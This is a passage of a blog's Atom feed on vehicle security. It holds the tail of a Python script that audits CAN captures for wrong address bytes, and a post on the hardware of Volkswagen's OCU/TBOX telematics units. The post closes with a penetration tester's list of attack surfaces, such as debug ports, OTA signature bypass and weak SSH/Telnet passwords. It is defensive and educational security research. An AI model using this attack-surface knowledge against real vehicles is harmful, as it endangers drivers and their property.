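        results.append((ident_hex, verdict))
    return results


# Constructed capture (not from the post): two legitimate frames, a frame from
# an unknown source address, a frame addressed to an unknown node, and an
# 11-bit frame that does not belong to the protocol at all.
SAMPLE_LOG = """
can0  1826F456   [8]  01 00 00 00 00 00 00 00
can0  182756F4   [8]  01 00 00 00 00 00 00 00
can0  1826F4AA   [8]  01 00 00 00 00 00 00 00
can0  18260156   [8]  01 00 00 00 00 00 00 00
can0  36F        [8]  F8 FF FF BF FF FF FF 07
"""

if __name__ == "__main__":
    print(hex(build_id(6, 0x2600, BMS, CHARGER)))
    for ident, verdict in audit_candump(SAMPLE_LOG, "charger-bms"):
        print(ident, verdict)
```

Running the file builds the identifier for a priority-6 frame with the assumed PGN 0x2600 from the charger to the BMS and then classifies each line of the constructed capture. Because the addresses are fixed by the specification rather than authenticated, this check only catches frames that use the wrong address bytes; a node on the bus that simply uses the legitimate source and destination values is indistinguishable from the real peer at this layer, so address checks are a sanity filter for captures and a detection aid, not an authentication mechanism.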
<summary type="html"><p>On 30 July the State Council formally published the Regulations on the Security Protection of Critical Information Infrastructure, which shows how seriously the state takes the security of critical information infrastructure. EV charging facilities are an important part of that infrastructure, and Article 3 of the Several Provisions on Automotive Data Security Management also classifies <code>operating data of vehicle charging networks</code> as important data</summary>
<category term="Automotive" scheme="http://delikely.github.io/tags/Automotive/"/>
</entry>
<entry>
<title>Connected-vehicle security fundamentals: Volkswagen J949 (OCU/TBOX)</title>
<link href="http://delikely.github.io/2021/09/29/VW-OCU/"/>
<id>http://delikely.github.io/2021/09/29/VW-OCU/</id>
<published>2021-09-29T04:46:29.000Z</published>
<updated>2021-10-29T16:08:58.000Z</updated>
<content type="html"><![CDATA[<h2 id="车联网安全基础知识之大众J949-OCU-TBOX"><a href="#车联网安全基础知识之大众J949-OCU-TBOX" class="headerlink" title="车联网安全基础知识之大众J949(OCU/TBOX)"></a>Connected-vehicle security fundamentals: Volkswagen J949 (OCU/TBOX)</h2><p>The OCU (Online Connectivity Unit) is the emergency call module and communication unit. The equivalent module in other vehicles is usually called a TBOX (Telematics Box) in China and a TCU (Telematics Control Unit) abroad.</p><p>The OCU has a fixed built-in SIM card for registering on the mobile network. Its role is to send and receive data and commands for the Car-Net e-Remote service. It maintains a permanent internet connection over the wireless network so that data can flow between the back end and the vehicle, and it can receive, process and execute commands even after the ignition is switched off. The OCU is one of the most important components of the connected-vehicle system.</p><h3 id="主要功能"><a href="#主要功能" class="headerlink" title="主要功能"></a>Main functions</h3><p>The OCU's functions are similar to those of other TBOXes; see <a href="https://mp.weixin.qq.com/s/WmNT6Kbw74EluaKLZUH64g">Connected-vehicle security fundamentals: main functions of the TBOX</a> for details.</p><h3 id="4-代-OCU-硬件分析"><a href="#4-代-OCU-硬件分析" class="headerlink" title="4 代 OCU 硬件分析"></a>Hardware analysis of four OCU generations</h3><p>The first generation, OCU1, appeared in 2012; four iterations later the current version is the fourth-generation OCU4. The supplier is LG. The first generation was made in Vietnam, the third in China or Vietnam, and the fourth in Vietnam. From the third generation on, the OCU gradually gained support for automotive Ethernet.</p><p>The OCU is mounted behind the dashboard and comes with a backup battery and a backup antenna. Externally it connects to a cellular antenna and a GNSS antenna, and some versions also have a Wi-Fi antenna. The backup battery, built-in speaker and built-in communication antenna make the OCU more robust, so that eCall still works if the whole vehicle loses power. The main connector carries power, the debug interface, CAN, Ethernet, audio/video and other signals.</p><p><img src="image-20210727235612456.png" alt="image-20210727235612456" style="zoom:38%;" /></p><p>For external communication the OCU uses a built-in eSIM; the supported bands differ somewhat by country. GNSS positioning supports all the mainstream systems: GPS, GLONASS, BeiDou, SBAS and Galileo.</p><h4 id="OCU4-TLVHE4IU"><a href="#OCU4-TLVHE4IU" class="headerlink" title="OCU4-TLVHE4IU"></a>OCU4-TLVHE4IU</h4><p>The latest, fourth-generation OCU was introduced in 2019. The ID.4 that Volkswagen launched this year uses the OCU4.</p><p><img src="image-20210810173934227.png" alt="image-20210810173934227" style="zoom:50%;" /></p><h5 id="TLVHE4IU-N"><a href="#TLVHE4IU-N" class="headerlink" title="TLVHE4IU-N"></a><a href="https://fccid.io/BEJTLVHE4IU-N">TLVHE4IU-N</a></h5><p>The high-spec OCU4; no Bluetooth or Wi-Fi. Main chips:</p><ul><li><strong>Cellular module</strong>: Qualcomm MDM9240, bands GSM 850/1900, UMTS B2/B4/B5/*B6, LTE FDD B2/B4/B5/B12/B13/B17/B29 (RX);</li><li><strong>MCU:</strong> Infineon TriCore <a href="https://www.infineon.com/cms/en/product/microcontroller/32-bit-tricore-microcontroller/32-bit-tricore-aurix-tc2xx/tc2xx-emulation-devices/sak-tc234le-32f200f-ab/">SAK-TC234LE-32F200F AB</a>, with a rich set of interfaces: 1x FlexRay, 2x LIN, 4x QSPI, 6x CAN including CAN FD with its higher data rate;</li></ul><p><img src="image-20210810175257907.png" alt="image-20210810175257907"></p><h5 id="TLVHE4IU-E"><a href="#TLVHE4IU-E" class="headerlink" title="TLVHE4IU-E "></a><a href="https://fccid.io/BEJTLVHE4IU-N">TLVHE4IU-E </a></h5><p>No Bluetooth or Wi-Fi. Main chips:</p><ul><li><p><strong>Cellular module</strong>: Qualcomm MDM9240, band LTE FDD B7.</p></li><li><p><strong>MCU:</strong> Infineon TriCore <a href="https://www.infineon.com/cms/en/product/microcontroller/32-bit-tricore-microcontroller/32-bit-tricore-aurix-tc2xx/tc2xx-emulation-devices/sak-tc234le-32f200f-ab/">SAK-TC234LE-32F200F AB</a>, with a rich set of interfaces: 1x FlexRay, 2x LIN, 4x QSPI, 6x CAN including CAN FD with its higher data rate;</p></li></ul><p><img src="image-20210810173138847.png" alt="image-20210810173138847"></p><h4 id="OCU3-TLVHM3IU-TLVLM3IU"><a href="#OCU3-TLVHM3IU-TLVLM3IU" class="headerlink" title="OCU3-TLVHM3IU/TLVLM3IU"></a>OCU3-TLVHM3IU/TLVLM3IU</h4><p>The OCU3 PCBs share a broadly similar layout: a cellular module plus an MCU that talks to the vehicle buses, optional parts such as an Ethernet bridge or Wi-Fi chip fitted as required, and the basic circuitry (power management, crystals, filtering and so on).</p><p>The OCU3 comes in a high-spec and a low-spec version, each with further sub-variants. The direct difference between high and low spec is that the high-spec unit supports Ethernet and the low-spec unit does not. The other variants differ mainly in the bands supported by the cellular baseband and in whether Wi-Fi and Bluetooth are present.</p><p>There are many OCU3 sub-versions, and two housing styles as shown below: the one on the left is rounded, the one on the right angular.</p><p><img src="image-20210727224548555.png" alt="image-20210727224548555" style="zoom:25%;" /></p><h5 id="TLVHM3IU-E、TLVHM3IU-N-高配"><a href="#TLVHM3IU-E、TLVHM3IU-N-高配" class="headerlink" title="TLVHM3IU-E、TLVHM3IU-N 高配"></a><a href="https://fccid.io/BEJTLVHM3IU-E">TLVHM3IU-E</a>, <a href="https://fccid.io/BEJTLVHM3IU-N">TLVHM3IU-N</a> (high spec)</h5><p>High-spec OCU3 with Ethernet but no Wi-Fi or Bluetooth. Main chips:</p><ul><li><p><strong>Cellular module</strong>: Qualcomm MDM9240, bands GSM 900/1800, UMTS B1/B3/B8, LTE FDD B1/B3/B7/B8/B20/B28A;</p></li><li><p><strong>Ethernet bridge:</strong> Toshiba <a href="https://toshiba.semicon-storage.com/ap-en/semiconductor/product/automotive-devices/automotive-interface-bridge-ics/detail.TC9560XBG.html">TC9560XBG</a>, ARM Cortex-M3 based, supporting IEEE 802.1AS, IEEE 802.1Qav and related standards; Realtek <a href="https://edit.wpgdadawant.com/uploads/news_file/program/2019/35382/tech_files/RTL9047AA_SDK_API_guite_DDT.pdf">RTL9044AB</a>;</p></li><li><p><strong>MCU:</strong> Infineon TriCore <a href="https://www.infineon.com/cms/en/product/microcontroller/32-bit-tricore-microcontroller/32-bit-tricore-aurix-tc2xx/tc2xx-emulation-devices/sak-tc234le-32f200f-ab/">SAK-TC234LE-32F200F AB</a>, with a rich set of interfaces: 1x FlexRay, 2x LIN, 4x QSPI, 6x CAN including CAN FD with its higher data rate;</p></li></ul><p><img src="image-20210804142622826.png" alt="image-20210804142622826" style="zoom:25%;" /></p><h5 id="TLVLM3IU-N-低配"><a href="#TLVLM3IU-N-低配" class="headerlink" title="TLVLM3IU-N 低配"></a><a href="https://fccid.io/BEJTLVLM3IU-N">TLVLM3IU-N</a> (low spec)</h5><p>Low-spec OCU3 with Wi-Fi but no Ethernet or Bluetooth. Main chips:</p><ul><li><p><strong>Cellular module</strong>: Qualcomm MDM9628, bands GSM 900/1800, UMTS B1/B3/B8, LTE FDD B2/B4/B5/B12/B17;</p></li><li><p><strong>MCU:</strong> Infineon TriCore <a href="https://www.infineon.com/cms/en/product/microcontroller/32-bit-tricore-microcontroller/32-bit-tricore-aurix-tc2xx/tc2xx-emulation-devices/sak-tc234le-32f200f-ab/">SAK-TC234LE-32F200F AB</a>, with a rich set of interfaces: 1x FlexRay, 2x LIN, 4x QSPI, 6x CAN including CAN FD with its higher data rate;</p></li></ul><p><img src="image-20210804152358291.png" alt="image-20210804152358291" style="zoom:30%;" /></p><h5 id="TLVLM3IU-E-低配"><a href="#TLVLM3IU-E-低配" class="headerlink" title="TLVLM3IU-E 低配"></a><a href="https://fccid.io/BEJTLVLM3IU-E">TLVLM3IU-E</a> (low spec)</h5><p>Low-spec OCU3 with no Ethernet, Wi-Fi or Bluetooth. Main chips:</p><ul><li><p><strong>Cellular module</strong>: Qualcomm MDM9240, bands GSM 900/1800, UMTS B1/B3/B8, LTE FDD B1/B3/B7/B8/B20/B28A;</p></li><li><p><strong>MCU:</strong> Infineon TriCore <a href="https://www.infineon.com/cms/en/product/microcontroller/32-bit-tricore-microcontroller/32-bit-tricore-aurix-tc2xx/tc2xx-emulation-devices/sak-tc234le-32f200f-ab/">SAK-TC234LE-32F200F AB</a>, with a rich set of interfaces: 1x FlexRay, 2x LIN, 4x QSPI, 6x CAN including CAN FD with its higher data rate;</p></li></ul><p><img src="image-20210804154005728.png" alt="image-20210804154005728" style="zoom:36%;" /></p><h4 id="OCU2-TUVM02IU"><a href="#OCU2-TUVM02IU" class="headerlink" title="OCU2 - TUVM02IU"></a>OCU2 - TUVM02IU</h4><p>FCC IDs include TUVM02IU-E and TUVM02IU-C; no detailed documentation was found.</p><p><img src="image-20210804193001931.png" alt="image-20210804193001931" style="zoom: 30%;" /></p><h4 id="OCU1-TUVM01IU"><a href="#OCU1-TUVM01IU" class="headerlink" title="OCU1-TUVM01IU"></a>OCU1-TUVM01IU</h4><p><a href="https://fccid.io/BEJTUVM01IU">TUVM01IU</a> is the first-generation OCU, made in Vietnam. Supported bands include GSM 1900 PCS UP | LTE 2, 1900 PCS UP | LTE 25, 1900+ UP | LTE 35, TD PCS Lower DOWN | UMTS CH 2 UP | UMTS CH 25 UP | UMTS CH 35 DOWN.</p><p>The first generation went through three major hardware revisions; TUVM01IU-G spawned TUVM01IU-R, TUVP01IU-G, TUVP01IU-R and others.</p><p><img src="image-20210804193247841.png" alt="image-20210804193247841" style="zoom:30%;" /></p><p>Below is the board of a first-generation OCU used on the MQB platform; some chip markings are no longer legible. The identifiable main chips:</p><ul><li><strong>MCU:</strong> Freescale <a href="https://www.nxp.com.cn/part/SPC5606BK0MLL6?lang=cn#/">SPC5606BMLL6</a>, a 32-bit PowerPC MCU with 1 MB of flash and a 64 MHz core; it has 6 CAN channels and is debugged over JTAG.</li><li><strong>SDRAM: </strong> Winbond <a href="https://www.semiee.com/file/Winbond/Winbond-W94AD6KBHX.pdf">W94AD6KBHX</a>.</li></ul><p><img src="image-20210804215151781.png" alt="image-20210804215151781"></p><h4 id="接口测试"><a href="#接口测试" class="headerlink" title="接口测试"></a>Interface tests</h4><p>I happened to have an OCU3 on hand. After powering it from 12 V DC, I identified the CAN interface with a logic analyser; one of the frames had ID 0x36F and data F8 FF FF BF FF FF FF 07.</p><p><img src="image-20210804161054778-16285767429881.png" alt="image-20210804161054778"></p><p>Identifying the serial port did not go as smoothly: the data could not be decoded at any of the common baud rates. Presumably a proprietary protocol is used, so no plaintext is visible. Using the serial port requires the ODT development tool described below.</p><p><img src="image-20210621203222034.png" alt="image-20210621203222034"></p><p>Tests of the other interfaces are not shown here.</p><h4 id="开发工具-ODT"><a href="#开发工具-ODT" class="headerlink" title="开发工具 ODT"></a>Development tool: ODT</h4><p>For the first-generation OCU, ODT (OCU Development Tool) is used to debug, test and analyse the unit.</p><p><img src="image-20210803190800583.png" alt="image-20210803190800583" style="zoom:35%;" /></p><p>ODT runs on Windows and connects to the OCU through a USB-to-serial adapter. It can display information, set parameters and trigger functions.</p><ul><li><strong>Display information:</strong> ODT gives a direct view of GNSS position, network status, SIM card information, power state, system logs, service logs, debug logs, configuration data and more;</li><li><strong>Set parameters:</strong> beyond viewing, it can set a series of parameters such as the APN and the power-supply mode;</li><li><strong>Trigger functions:</strong> it can also send and receive SMS, play audio, upgrade the system and so on.</li></ul><p><img src="image-20210803191145364.png" alt="image-20210803191145364"></p><h4 id="车联网中的-OCU"><a href="#车联网中的-OCU" class="headerlink" title="车联网中的 OCU"></a>The OCU in the connected-vehicle system</h4><p>The OCU sits at the centre of the connected-vehicle system. As the figure below shows, the OCU connects to the gateway over CAN and automotive Ethernet; the J794 (head unit) is connected to the OCU over the infotainment CAN and is also wired to the OCU's microphone and speaker.</p><p><img src="image-20210804173827503.png" alt="image-20210804173827503"></p><p>In Volkswagen's latest electronic architecture the OCU connects to the in-car application server (ICAS1) over automotive Ethernet and CAN, and to the infotainment system (ICAS3) over A2B.</p><p><img src="image-20210803221158220.png" alt="image-20210803221158220"></p><h4 id="OCU-硬件总结"><a href="#OCU-硬件总结" class="headerlink" title="OCU 硬件总结"></a>OCU hardware summary</h4><p>Across the four generations the OCU has gained functions and carries ever more data. Externally the generations differ little: the connections are still a handful of antenna ports and the pins of the main connector, although a few ports have been added. On the chip side the design is still a cellular module paired with an MCU, the module handling wireless communication with the outside world and the MCU handling the vehicle buses. As automotive Ethernet has come into wide use in vehicles, the appearance of an Ethernet switch chip is the biggest change in the OCU's evolution and, in a sense, marks the transformation of in-vehicle networking.</p><p>The main chips have changed little over the generations: the cellular module is built on Qualcomm's MDM platform and supplied by Sierra Wireless, whereas TBOXes from other domestic vendors often use Quectel modules. The cellular module uses an eSIM; it connects to the MCU over SPI and GPIO, to the Ethernet bridge over PCIe, to the Ethernet switch over RGMII and SPI, and to the audio/video chip over I2S.</p><p>The MCU connects to the main controller (the cellular module) over SPI and GPIO, and on the other side to CAN, buttons, the airbag and so on.</p><p><img src="image-20210813124534571.png" alt="image-20210813124534571"></p><p>This article focuses on hardware; the system and software will be covered in a later article.</p><h3 id="安全威胁"><a href="#安全威胁" class="headerlink" title="安全威胁"></a>Security threats</h3><p>This section looks at OCU security from a penetration tester's perspective and lists some common risk points, using the Volkswagen OCU as the subject but also touching on problems common to TBOXes in general.</p><h4 id="通信"><a href="#通信" class="headerlink" title="通信"></a>Communication</h4><ul><li><p>Wireless</p><p>The OCU's wireless links are cellular, GNSS, Wi-Fi and possibly Bluetooth. Cellular connections risk being downgraded; positioning can be spoofed, although domestic units use multiple constellations and only GPS is readily spoofable, so the threat is smaller; for Wi-Fi the concerns are configuration security, above all the strength of the initial password, then network isolation and the security of the services exposed on the Wi-Fi network; for Bluetooth the main concern is the protocol stack.</p></li><li><p>Private APN</p><p>The OCU's APN leads into the manufacturer's internal network, which is often weakly defended and easy to penetrate.</p></li><li><p>Vehicle buses</p><p>Other ECUs can be attacked from the OCU's bus connections.</p></li></ul><h4 id="OTA"><a href="#OTA" class="headerlink" title="OTA"></a>OTA</h4><p>Normally OTA requests and firmware delivery in a connected vehicle go through the OCU and the TSP. Once system privileges are obtained, firmware packages can be retrieved either by analysing the update program or by analysing the traffic; analysing the packages reveals weaknesses to exploit, and also the update logic of other ECUs, so that flaws in the update program can be used to flash malicious firmware that bypasses security restrictions or plants malicious code.</p><p><img src="image-20210815221455601.png" alt="image-20210815221455601"></p><p>Some points where problems can arise:</p><ol><li>Cloud-side threats: vulnerabilities in the OTA platform.</li><li>OTA firmware leaks, via OTA management platform vulnerabilities, leaked test packages, after-sales leaks, interception of plaintext transfers, download URLs recovered by reverse engineering the program, and so on.</li><li>Design flaws in the update program, such as bypass of update package signature verification.</li><li>OTA availability: if the update policy and the user prompts are not sound, a software update can seriously endanger consumers' lives and property. One model was stuck for an hour on Chang'an Avenue with the occupants unable to control the car or even get out, a serious hazard to traffic safety and to the users' lives.</li></ol><h4 id="硬件安全"><a href="#硬件安全" class="headerlink" title="硬件安全"></a>Hardware security</h4><ol><li>Unprotected debug interfaces left in place, such as serial, ADB, USB and JTAG.</li><li>Storage security: flash in SOP packages is easy to desolder and dump.</li><li>MCU code read protection not enabled, allowing firmware extraction, live debugging and so on.</li></ol><h4 id="系统-软件安全"><a href="#系统-软件安全" class="headerlink" title="系统/软件安全"></a>System and software security</h4><ol><li>Outdated components: open-source components with known vulnerabilities, such as Dnsmasq.</li><li>No privilege separation: everything runs as root.</li><li>Vulnerabilities in the software itself, such as command injection and buffer overflows.</li><li>Flawed exposed services: weak SSH and Telnet passwords, proprietary services carrying sensitive data, and so on.</li></ol><h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>Summary</h3><p>This article is essentially a security analysis of the TBOX. I did not discuss the TBOX directly because that would have been too abstract; instead the OCU makes the TBOX concrete and provides a real case. Different manufacturers' designs differ, but broadly they are similar, so the security understanding of the OCU can be extended to other TBOXes.</p><h3 id="致谢"><a href="#致谢" class="headerlink" title="致谢"></a>Acknowledgements</h3><p>Thanks to Julie for proofreading and suggestions, and to Gorgias for providing reference material.</p><h3 id="参考"><a href="#参考" class="headerlink" title="参考"></a>References</h3><ul><li><p><a href="https://fccid.io/">FCC ID Search</a></p></li><li><p><a href="https://zhuanlan.zhihu.com/p/149857986">Volkswagen's Telematics OCU3 unit</a></p></li><li><a href="https://mp.weixin.qq.com/s/F27-l4K5Pw7Y8rAu4yobzQ">Primer on the eCall vehicle emergency call system</a></li><li><a href="https://www.sohu.com/a/451924689_391994">In-depth analysis of the Volkswagen ID.3 architecture: the software-defined car is still far off</a></li><li><a href="https://mp.weixin.qq.com/s/SETvDrL9CDd0sjIHKIOKYw">How much do you know about the RTM system fitted to hybrid and new-energy vehicles?</a></li><li><a href="https://baijiahao.baidu.com/s?id=1659120997441175732&wfr=spider&for=pc">Autonomous driving report: three driving forces, the inflection point has arrived</a></li><li><a href="https://www.izt-labs.de/testing-ecall-systems/">IZT Signal Generators ready for testing eCall-Systems - IZT GmbH</a></li><li><a href="https://www.sohu.com/a/197544369_776444">Automotive TCU (Telematics Control Unit): application value and trends</a></li></ul><h3 id="系列文章"><a href="#系列文章" class="headerlink" title="系列文章"></a>Articles in this series</h3><ul><li><a href="https://mp.weixin.qq.com/s/FzF7ERiWZ_GGKLW4kqrH9Q">Connected-vehicle security fundamentals: automotive modular platforms</a></li><li><a href="https://mp.weixin.qq.com/s/YyHRexeKgGd4RAgQ4o-jKw">Connected-vehicle security fundamentals: Volkswagen Group electrical/electronic architecture</a></li><li><a href="https://mp.weixin.qq.com/s/WmNT6Kbw74EluaKLZUH64g">Connected-vehicle security fundamentals: main functions of the TBOX</a></li></ul>]]></content>
<summary type="html"><h2 id="车联网安全基础知识之大众J949-OCU-TBOX"><a href="#车联网安全基础知识之大众J949-OCU-TBOX" class="headerlink" title="车联网安全基础知识之大众J949(OCU/TBOX)"></a>Connected-vehicle security fundamentals:</summary>
<category term="Automotive" scheme="http://delikely.github.io/tags/Automotive/"/>
</entry>
</feed>